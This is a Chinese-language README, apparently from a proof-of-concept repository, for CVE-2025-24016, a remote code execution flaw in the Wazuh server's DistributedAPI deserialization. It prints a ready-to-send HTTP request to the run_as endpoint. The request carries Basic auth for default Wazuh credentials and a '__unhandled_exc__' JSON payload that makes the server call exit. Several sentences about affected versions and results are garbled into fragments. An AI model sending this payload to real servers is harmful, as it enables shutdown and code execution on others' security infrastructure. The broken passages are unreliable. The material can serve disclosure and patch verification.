
CVE-2025-24016: Wazuh 服务器中的 RCE!远程代码执行
本仓库演示了 Wazuh 服务器中由 wazuh-manager 包的不安全反序列化引入的远程代码执行(RCE)漏洞。该漏洞允许具有 API 访问权限的远程攻击者(受感染的仪表盘、集群中的 Wazuh 服务器,或某些配置下受感染的代理)在服务器上执行任意代码。
wazuh-manager 版本 >= 4.4.0>= 4.9.1 中修复该漏洞出现在 Wazuh API 中,DistributedAPI 中的参数会被序列化为 JSON,并在 framework/wazuh/core/cluster/common.py 文件中使用 as_wazuh_object 进行反序列化。攻击者可以通过向 DAPI 请求注入未经净化的字典来利用此漏洞,这可能导致任意 Python 代码被执行。
攻击者可以通过 run_as 端点触发 RCE,该端点允许攻击者控制 auth_context 参数。通过构造恶意请求,可以在主服务器上执行任意代码。
要使用服务器 API 触发此漏洞,请按照以下步骤操作。
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}

wazuh-wui:MyS3cr37P450r.*-)。__unhandled_exc__,它会触发任意 Python 代码(此处为 exit)的执行。>= 4.4.0 直至 4.9.0(尚未修复)。exit 函数被触发,导致 Wazuh 服务器关闭。为保护您的系统,请升级到已修复此问题的 Wazuh 版本 >= 4.9.1。